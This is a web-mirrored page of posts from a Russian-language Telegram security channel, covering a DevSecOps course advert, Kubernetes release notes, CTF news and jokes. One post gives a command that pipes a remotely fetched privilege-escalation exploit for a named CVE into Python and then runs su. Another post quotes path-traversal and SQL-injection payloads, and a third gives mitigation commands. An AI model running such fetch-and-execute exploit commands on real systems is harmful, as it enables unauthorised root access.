TGViewer
Channel Public Channel
Ever Secure

Ever Secure

@ever_secure

Авторский канал про безопасность и не только
Youtube - https://www.youtube.com/@EverSecure
Boosty - boosty.to/ever_secure
Чат - @ever_secure_chat
Вакансии - @ever_secure_jobs
Несмешные мемы - @fsecurity_channel

По всем вопросам: @aleksey0xffd
Subscribers
4.73K
Photos
929
Videos
76
Links
550

Showing posts older than #1193 · Back to latest

Older Posts 15 shown
Post #1192 2.33K
Ever Secure Хочу немного рассказать о преподавательском составе курса! Для такого легендарного курса, я позвал не менее легендарных преподавателей. Вот первый из них: Александр Кондратьев (Автор канала Админим с Буквой @bykvaadm, Head of DevOps BI.ZONE). Саша DevOps…
Продолжая про наш будущий курс 👀
DevSecOps — это не «человек со сканером»

Когда я как руководитель собеседую DevSecOps, мне неинтересно, умеет ли человек воткнуть Trivy в пайплайн (у меня это спокойно делали стажеры). Мне важно: понимает ли он, что именно сканер ищет, сможет ли проэксплуатировать находку руками, объяснит ли разработчику, почему так сломалось и как правильно чинить.

Такому же подходу я придерживаюсь и в обучении!

Под это я и собрал лабы - 23 категории уязвимостей, 50+ флагов на эксплуатацию. И главное - не на уровне
../../../etc/passwd и 1' OR 1=1 --.

хотя и их пройдем в самом начале 😉

Возьмём тот же Path Traversal. В лабе ты не просто читаешь ../../../etc/passwd. Ты учишься обходить фильтры:
• вырезания ../
• одинарное и двойное URL-кодирование
• кодирование только слеша / только точек
• absolute path bypass
• флаги раскиданы по разным файлам из реальных кейсов (будь то захардкоженные секреты в коде, креды в Dockerfile, интересных местах на системе и т.д). Таким образом, ты получаешь насмотренность

И так абсолютно по каждой теме: упор на вариативность векторов, обходы санитайзеров, реальные ошибки разработчиков, а не одна каноничная пейлоада из чек-листа. И это только 1 модуль из 11 💪

Моя цель: чтобы после курса человек смотрел на код и видел уязвимость до того, как сканер что-то скажет, прекрасно понимал, какие уязвимости он найдет с помощью SAST и DAST, а что не увидит и вовсе. Это и есть DevSecOps специалист, за которого я готов платить.

Старт: 06.06.26
Стоимость: 99к для первого потока
  • 🔥 23
  • 🥴 7
  • 🥱 5
  • 🙈 5
  • 👍 4
Post #1191 2.16K
Уже скрипты какие-то рекламируют на улице, аккуратнее...
  • 😁 33
Post #1190 2.74K
Cloudflare пометила сайт <месенджера с парковки> вредоносным

https://radar.cloudflare.com/scan/3c745d75-2df5-4480-947f-278da1221657/summary


В пресс-службе Max заявили, что мессенджер "регулярно проходит аудиты безопасности, работает с исследователями через программу Bug Bounty и имеет собственный центр безопасности для защиты пользователей от реальных угроз".


Видимо товарищ майор в список оплачиваемых уязвимостей не входил 🌚
  • 😁 13
  • ❤ 4
  • 👏 3
  • 🔥 1
Post #1189 2.27K

Forwarded from IT STAND

Live: Kubernetes v1.36: Haru

Рассмотрим нововведение:
- Функция NodeLogQuery контроля доступа включена по умолчанию
- Плагин gitRepovolumes удален навсегда
- Service.spec.externalIPs устарело. Это поле является известным вектором атаки типа MITM (Man-in-the-Middle) со времен CVE-2020-8554.
И многое другое
Обсудим примеры применения, что еще сырое, а что must have и срочно надо внедрять)

❤️ Главный по безопасным кубикам - Алексей Федулаев @int0x80h
❤️ Админ Девелоперович - Георг Гаал @gecube

Традиционно обозревают новую версию Kubernetes 1.36
🕖 уже в четверг в 20:00

Прямая трансляция: youtube.com/watch?v=l55Svj_WwH0
с ответами на вопросы из чата YouTube

При поддержке:
@kuber_community @ever_secure @devopsforlove @kubernetes_ru

🔥IT STAND | FIDELINA | YouTube
  • ❤ 1
  • 🔥 1
Post #1188 2.15K
Кто-нибудь, скажите уже ребятам из Ozon, что при нажатии в письме отписаться от рассылки, нужно ансанскрайбить, а не вести в личный кабинет, которого у меня давно нет, но к нему привязана почта, а меня перекидывает в новый кабинет где почты никакой и нет. Номера старого у меня тоже нет.

Предыдущий пост тут
https://t.me/ever_secure/1071
Но там был Ozon Travel, теперь Ozon Fintech. я не понимаю как я подписался на все появляющиеся новые продукты, но очень хочу отписаться(

Кажется UX дизайнеру пока на покойотдых)
  • 👾 9
  • 👍 7
  • 👏 3
  • ❤ 2
Post #1187 3K
патч:

rm -rf /lib/modules/*/kernel/crypto/algif_aead.*

или

echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead 2>/dev/null || true


👀@ever_secure | 💪 Мерч | 💳Поддержать
  • ❤ 4
Post #1186 2.64K
в контейнере тоже можно поднять права, если есть петухон (КОНКРЕТНО ДЛЯ ЭТОГО ЭКСПЛОИТА, НАПИСАННОГО НА Python), а дальше уже вы все и так знаете...

но если нет, прикладываю видос с побегами https://youtu.be/biC3TO7OELY

👀@ever_secure | 💪 Мерч | 💳Поддержать
  • 🔥 6
Post #1185 5.66K
астрологи объявили неделю обновлений CVE-2026-31431

curl https://copy.fail/exp | python3 && su


👀@ever_secure | 💪 Мерч | 💳Поддержать
  • ❤ 7
  • 😨 5
  • 💯 2
  • 🤣 2
Post #1184 2.23K
Вчера в гостях у канала был Андрей Усенок, сняли для вас потрясающий материал 😉
  • 👍 10
  • 👏 3
Post #1183 2.38K
Ever Secure Друзья, а я напоминаю, что ваш покорный слуга отправляется на CISO FORUM 2026 🔥 Ожидаем много новых гостей на CISO Podcast? 😉 Это не просто форум — это ваша возможность выйти на прямой диалог с лидерами кибербезопасности России. 28 апреля 2026 года в Центре…
Завтра веду секцию "Эволюция атак" на CISO FORUM
Можно будет меня там поймать 😉

Кого бы вы хотели видеть на CISO Podcast? Пишите в комментарии кого попробовать поймать👇

👀@ever_secure | 💪 Мерч | 💳Поддержать
  • 👏 6
Post #1178 5.39K
Сегодня был важный день для команды Ever Secure. Мы провели CTF на конференции DUMP в Екб. * Это те самые лабы, которые будут в нашем курсе, который уже скоро стартует 😏

Вдвойне жесткий день, т.к. спали около 2 часов, до 5 утра сидели с @Bykva и фиксили баги, пилили харденинг и мониторинг 🫠. Спасибо @weahiro за топовый багхантинг. В итоге 23/24 тасок были решены. Только 1 была с багой (захарденили сами себя 😏)

Немного фото с награждения победителей 😉 поздравляю 🎉
  • 🔥 18
  • 🌚 3
  • ❤ 1
  • 😁 1
Post #1174 2.4K
Иронично 😏
  • 😁 16
  • 😭 2
Post #1173 2.14K
впервые в жизни ИБ дошло до физического разделения контуров...
  • 👍 20
  • 🐳 5
  • 😭 3
  • ❤ 2
Older posts →
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →